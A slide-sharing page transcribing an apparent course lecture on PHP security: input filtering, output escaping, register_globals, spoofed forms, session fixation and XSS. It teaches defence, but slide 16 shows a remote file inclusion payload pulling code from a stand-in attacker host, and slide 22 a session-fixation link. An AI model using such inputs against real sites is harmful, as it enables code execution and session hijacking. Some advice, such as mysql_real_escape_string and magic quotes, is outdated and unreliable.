Presentation is loading. Please wait.

Presentation is loading. Please wait.

PHP2010/11 : [‹#›] PHP Security. PHP2010/11 : [‹#›] Two Golden Rules 1.FILTER external input Obvious.. $_POST, $_COOKIE, etc. Less obvious.. $_SERVER.

Published byOswin Garrett Modified over 9 years ago

Similar presentations

Presentation on theme: "PHP2010/11 : [‹#›] PHP Security. PHP2010/11 : [‹#›] Two Golden Rules 1.FILTER external input Obvious.. $_POST, $_COOKIE, etc. Less obvious.. $_SERVER."— Presentation transcript:

1 PHP2010/11 : [‹#›] PHP Security

2 PHP2010/11 : [‹#›] Two Golden Rules 1.FILTER external input Obvious.. $_POST, $_COOKIE, etc. Less obvious.. $_SERVER 2.ESCAPE output Client browser MYSQL database Email

3 PHP2010/11 : [‹#›] Two Golden Rules PHP Script FilterEscape Cookie Forms Referer, etc. xhtml MYSQL email

4 PHP2010/11 : [‹#›] Filtering Process by which you inspect data to prove its validity. Adopt a whitelist approach if possible: assume the data is invalid unless you can prove otherwise. Useless unless you can keep up with what has been filtered and what hasn’t…

5 PHP2010/11 : [‹#›] Filter example $clean = array(); if (ctype_alnum($_POST['username'])) { $clean['username'] = $_POST['username']; }

6 PHP2010/11 : [‹#›] Filter example $clean = array(); if (ctype_alnum($_POST['username'])) { $clean['username'] = $_POST['username']; } $clean = array(); Initialise an array to store filtered data.

7 PHP2010/11 : [‹#›] Filter example $clean = array(); if (ctype_alnum($_POST['username'])) { $clean['username'] = $_POST['username']; } if (ctype_alnum($_POST['username'])) Inspect username to make sure that it is alphanumeric.

8 PHP2010/11 : [‹#›] Filter example $clean = array(); if (ctype_alnum($_POST['username'])) { $clean['username'] = $_POST['username']; } $clean['username'] = $_POST['username']; If it is, store it in the array.

9 PHP2010/11 : [‹#›] Escaping Output Process by which you escape characters that have a special meaning on a remote system. Unless you’re sending data somewhere unusual, there is probably a function that does this for you.. The two most common outputs are xhtml to the browser (use htmlentities() ) or a MYSQL db (use mysql_real_escape_string() ).

10 PHP2010/11 : [‹#›] Escape example $xhtml = array(); $xhtml['username'] = htmlentities($clean['username'], ENT_QUOTES, 'UTF-8'); echo " Welcome back, {$xhtml['username']}. ";

11 PHP2010/11 : [‹#›] Escape example $xhtml = array(); $xhtml['username'] = htmlentities($clean['username'], ENT_QUOTES, 'UTF-8'); echo " Welcome back, {$xhtml['username']}. "; $xhtml = array(); Initialize an array for storing escaped data.

12 PHP2010/11 : [‹#›] Escape example $xhtml = array(); $xhtml['username'] = htmlentities($clean['username'], ENT_QUOTES, 'UTF-8'); echo " Welcome back, {$xhtml['username']}. "; $xhtml['username'] = htmlentities($clean['username'], ENT_QUOTES, 'UTF-8'); Escape the filtered username, and store it in the array.

13 PHP2010/11 : [‹#›] Escape example $xhtml = array(); $xhtml['username'] = htmlentities($clean['username'], ENT_QUOTES, 'UTF-8'); echo " Welcome back, {$xhtml['username']}. "; Send the filtered and escaped username to the client.

14 PHP2010/11 : [‹#›] That’s it! If you follow these rules religiously, you will produce secure code that is hard to break. If you don’t, you will be susceptible to.. Next: COMMON ATTACK METHODS

15 PHP2010/11 : [‹#›] Register Globals: Eh? All superglobal variable array indexes are available as variable names.. e.g. in your scripts: $_POST[‘name’] is available as $name $_COOKIE[‘age’] is available as $age Most PHP installations have this option turned off, but you should make sure your code is secure if it is turned on.

16 PHP2010/11 : [‹#›] Register Globals: Example If you forget to initialise $path, and have register_globals enabled, the page can be requested with ?path=http%3A%2F%2Fevil.example.org%2F%3F in the query string in order to equate this example to the following: include 'http://evil.example.org/?/script.php'; i.e. a malicious user can include any script in your code..

17 PHP2010/11 : [‹#›] Register Globals: Solution Be aware that with register globals on, any user can inject a variable of any name into your PHP scripts. ALWAYS EXPLICITLY INITIALISE YOUR OWN VARIABLES!

18 PHP2010/11 : [‹#›] Spoofed Forms: Eh? Be aware that anybody can write their own forms and submit them to your PHP scripts. For example, using a select, checkbox or radio button form input does not guarantee that the data submitted will be one of your chosen options…

19 PHP2010/11 : [‹#›] Spoofed Forms: Example The form written by a web developer to be submitted to a page: red green blue The user writes their own form to submit to the same page:

20 PHP2010/11 : [‹#›] Spoofed Forms: Solution Users can submit whatever they like to your PHP page… and it will be accepted as long as it conforms to your rules. Make sure all your rules are checked by the PHP external data filter, don’t rely on a form to exert rules for you.. They can be changed!

21 PHP2010/11 : [‹#›] Session Fixation: Eh? Session attacks nearly always involve impersonation – the malicious user is trying to ‘steal’ someone else’s session on your site. The crucial bit of information to obtain is the session id, and session fixation is a technique of stealing this id.

22 PHP2010/11 : [‹#›] Session Fixation: Eh? 1. The malicious user hosts a page with links to your site/emails around spam links to your site with a session id already set. … <a href=“http://example.com/index.php?PHPSESSID=1234” …

23 PHP2010/11 : [‹#›] Session Fixation: Eh? 2. A client follows one of these links and is directed to your site, where they login. 3. Now.. the malicious user knows the session id (he/she set it!), and can ‘hijack’ the session by browsing to your site using the same session id. 4. Malicious user is now logged in as one of your legitimate clients. Ooops.

24 PHP2010/11 : [‹#›] Session Fixation: Solution To protect against this type of attack, first consider that hijacking a session is only really useful after the user has logged in or otherwise obtained a heightened level of privilege. If we regenerate the session identifier whenever there is any change in privilege level (for example, after verifying a username and password), we will have practically eliminated the risk of a successful session fixation attack.

25 PHP2010/11 : [‹#›] Session Fixation: Solution session_regenerate_id() Conveniently, PHP has a function that does all the work for you, and regenerates the session id. Regenerate the session id using this function before any change in privilege level.

26 PHP2010/11 : [‹#›] Accessing Credentials Sometimes you need to store sensitive data on your server such as database passwords, usernames, etc. There are various options…

27 PHP2010/11 : [‹#›] Accessing Credentials 1.Don’t store passwords in an included file without a *.php extension but in a web accessible directory…! 2.You can store in a *.php file under the root (i.e. web accessible). OK, but not great. If your PHP parse engine fails, this data will be on plain view to the entire world. 3.Better, is to keep as much code as possible, including definition of passwords, in included files outside of the web accessible directories. 4.With an Apache server, there are various techniques to include passwords and usernames as environment variables, accessed in PHP by the $_SERVER superglobal. best worst

28 PHP2010/11 : [‹#›] Cross-Site Scripting (XSS) This is a good example of why you should always escape all output, even for xhtml… echo ‘ Welcome, ‘.$_GET['username'].’ ’; echo ‘ Welcome, ‘.....’ ’;

29 PHP2010/11 : [‹#›] XSS: The Solution And again.. Filter input. Escape Output. Be especially careful if you are writing user input to a file, which is later include d into your page.. Without checking, the user can then write their own PHP scripts for inclusion.

30 PHP2010/11 : [‹#›] The ‘magic’ of PHP Recent versions of PHP have gone some way to tightening security, and one of the newer things is ‘magic quotes’. If turned on, this automatically escapes quotation marks and backslashes in any incoming data. Although useful for beginners, it cannot be relied upon if you want to write portable code. http://docs.php.net/en/security.magicquotes.html

31 PHP2010/11 : [‹#›] The ‘magic’ of PHP: banished! To know where you are starting from, you can use the get_magic_quotes_gpc() function to tell if they are on or off. To start from a consistent point, use stripslashes() to remove any escape characters added by ‘magic quotes’. e.g. if (get_magic_quotes_gpc()) { $thing = stripslashes($_POST[‘thing’]); }

32 PHP2010/11 : [‹#›] Phew.. But don’t panic! Open Source PHP code needs to be rock solid in terms of security, as everyone can look through the code. In your bespoke solutions, malicious users will have to try to guess.. Much harder!

33 PHP2010/11 : [‹#›] Review Filter Input + Escape Output = Secure Code

Download ppt "PHP2010/11 : [‹#›] PHP Security. PHP2010/11 : [‹#›] Two Golden Rules 1.FILTER external input Obvious.. $_POST, $_COOKIE, etc. Less obvious.. $_SERVER."

Similar presentations

Web Security Never, ever, trust user inputs Supankar.

Web Security Never, ever, trust user inputs Supankar.
PHP Hypertext Preprocessor Information Systems 337 Prof. Harry Plantinga.

PHP Hypertext Preprocessor Information Systems 337 Prof. Harry Plantinga.
Attacking Authentication and Authorization CSE 591 – Security and Vulnerability Analysis Spring 2015 Adam Doupé Arizona State University

Attacking Authentication and Authorization CSE 591 – Security and Vulnerability Analysis Spring 2015 Adam Doupé Arizona State University
Copyright © 2004 - The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation.
PHP Workshop ‹#› Forms (Getting data from users).

PHP Workshop ‹#› Forms (Getting data from users).
Page 1 PHP, HTML, STATE Achmad Arwan, S.Kom. Page 2 PHP ( PHP: Hypertext Preprocessor) A programming language devised by Rasmus Lerdorf in 1994 for building.

Page 1 PHP, HTML, STATE Achmad Arwan, S.Kom. Page 2 PHP ( PHP: Hypertext Preprocessor) A programming language devised by Rasmus Lerdorf in 1994 for building.
9/9/2005 Developing Secure Web Applications 1 Methods & Concepts for Developing “Secure” Web Applications Peter Y. Hammond, Developer Wasatch Front Regional.

9/9/2005 Developing "Secure" Web Applications 1 Methods & Concepts for Developing “Secure” Web Applications Peter Y. Hammond, Developer Wasatch Front Regional.
Introduction The concept of “SQL Injection”

Introduction The concept of “SQL Injection”
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.

By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.

Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.
Web Application Attacks ECE 4112 Fall 2007 Group 9 Zafeer Khan & Simmon Yau.

Web Application Attacks ECE 4112 Fall 2007 Group 9 Zafeer Khan & Simmon Yau.
Secure Software Engineering: Input Vulnerabilities

Secure Software Engineering: Input Vulnerabilities
MS3304: Week 4 PHP & HTML Forms. Overview HTML Forms elements refresher Sending data to a script via an HTML form –The post vs. get methods –Name value.

MS3304: Week 4 PHP & HTML Forms. Overview HTML Forms elements refresher Sending data to a script via an HTML form –The post vs. get methods –Name value.
PHP Security.

PHP Security.
Web forms in PHP Forms Recap  Way of allowing user interaction  Allows users to input data that can then be processed by a program / stored in a back-end.

Web forms in PHP Forms Recap  Way of allowing user interaction  Allows users to input data that can then be processed by a program / stored in a back-end.
Lecture 6 – Form processing (Part 1) SFDV3011 – Advanced Web Development 1.

Lecture 6 – Form processing (Part 1) SFDV3011 – Advanced Web Development 1.
Cosc 4765 Server side Web security. Web security issues From Cenzic Vulnerability report 2014 https://info.cenzic.com/2013-Application-Security-Trends-Report.html.

Cosc 4765 Server side Web security. Web security issues From Cenzic Vulnerability report
Open Source Server Side Scripting ECA 236 Open Source Server Side Scripting Cookies & Sessions.

Open Source Server Side Scripting ECA 236 Open Source Server Side Scripting Cookies & Sessions.
PHP Security Computer Security. overview  Xss, Css  Register_globals  Data Filtering  Sql Injection  Session Fixation.

PHP Security Computer Security. overview  Xss, Css  Register_globals  Data Filtering  Sql Injection  Session Fixation.

Similar presentations

Ads by Google